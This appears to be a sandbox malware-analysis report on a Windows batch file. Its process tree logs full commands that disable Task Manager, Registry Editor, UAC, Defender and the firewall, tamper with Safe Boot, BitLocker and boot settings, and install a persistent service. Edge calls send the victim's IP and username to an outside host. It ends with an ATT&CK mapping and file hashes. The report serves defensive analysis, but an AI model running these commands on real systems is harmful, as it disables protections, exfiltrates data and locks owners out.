C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.882⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=adminjk1232⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=oailvcny\admin2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "Admin"2⤵
-
C:\Windows\system32\net.exenet user "Admin"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin"4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\shutdown.exeshutdown /r /t 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5756 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4604 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4848 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5312 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=4472 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x410 0x2f81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6100 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2664 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3028 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3044 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4788 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4972 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5280 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5332 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5464 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Enumerates system info in registry
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b4,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb03⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2216 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2276 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2476 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\archive.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "OAILVCNY$"2⤵
-
C:\Windows\system32\net.exenet user "OAILVCNY$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38c0855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
System Services
1Service Execution
1Command and Scripting Interpreter
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
2Windows Service
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Disable or Modify System Firewall
1Modify Registry
1File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pmaFilesize
16KB
MD5cfab81b800edabacbf6cb61aa78d5258
SHA12730d4da1be7238d701dc84eb708a064b8d1cf27
SHA256452a5479b9a2e03612576c30d30e6f51f51274cd30ef576ea1e71d20c657376f
SHA512ec188b0ee4d3daabc26799b34ee471bee988bdd7ceb011ed7df3d4cf26f98932bbbb4b70dc2b7fd4df9a3981b3ce22f4b5be4a0db97514d526e521575efb2ec6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD557a59862764f93e0db15d19588a1bf0d
SHA16395b5c04714684dd3c9fe91ef320f8c96589408
SHA256e2ba074fa03fe36fe67aada9ec089dbe57eb75ad5bbc2cf0c1acf1784cb2d325
SHA5122e3fe9df098519ad6e84f2ac469521ff75713dad6dc2372f2a47c86a9c70ecb5feeb79e3d90981d9b9bcf39fd9d77916f1b56714b800d4679804236aa88a7ede
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD58a943235347945a47cc7bf6d526efba2
SHA104bed2470ca6c2bbb3b94c5e3d0fff1978d4986e
SHA2569ae2eb965708c552df31174a6dd47196986bf5dab29af6889fecf1c0c68f386b
SHA512934679f97318acc5c950911412369325ab72c7c7c69a1c2232da6f3edefce53dd1023ab15ccc7f1fc1e6f5271adb0fceb31752f8ddb78dd2b95e625a79744c3c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\185df0c1-5ef5-4866-b561-59f00fc7a5d8.tmpFilesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0Filesize
44KB
MD51a530e201f79e7bf348c1d9f370c931d
SHA15b216882d1eeebc9c3d722f85480c8101f6ad3ec
SHA25639752d0b46201f8cd056378e0dea67e6a8813640fcff039b84c7b6774c10ea73
SHA512cef6f4e6216cd775e5c5facb09d3bdb6e94af8b3b017c9cb5cb766c83ac7c3fff39c537b9de1ea1277c11b50e9c8168d7fcc893b8123fa25df3952f3f370ecc3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1Filesize
264KB
MD572ae60acaf59c703c0afe4d6eae55d30
SHA1540f7daf6458f50b929d7f59a5d161ee0ec03546
SHA25660530e55674a9f511784842ba8921695a3b160a496ed8b3228ab1be1c3039815
SHA512161762f0457444159b8de401b92f2ae8c5d9c24c6de593ec9ee459427b7e41fc622d8cdcf22f5a793207977ef0fa517b897411bbf615ae4d833daa2685f62a18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2Filesize
1.0MB
MD522f65f839d7de81242f284a8c4249e7a
SHA116abd12a7774c3dd7aace0b313b342a22430a0a5
SHA2569be86473773849097a21318a2a8a1533d1fb005afec7cafb01ef9607e86fc87e
SHA51233ac921f8805a9e1560cb105b6127a3997be01f7347f3215b4301669ab34d06952bda6a19bdb5e3ba75f2acdda4349968510f0afb7dd80a23239175915ac96e5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3Filesize
4.0MB
MD52c75c5015438644cfe7672b33e2a3ce7
SHA1bf195e6a40ffe7d856da91e6eb2e41528b8e5cc8
SHA25623bdf32b2b9c4f5fd0cd5ae8e817fd5c90feb8d6c2673e91ba2078325ceb94d4
SHA512b4fb044dc31dc1f2def09e8bd18377262116d1c10232191b16d2db349850924bd0e4833de9da59b9a0462303cbf944411e78c4907a6d35ec90bb8427801002c4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
336B
MD5df98d3f3982bda2173bac75bbac30205
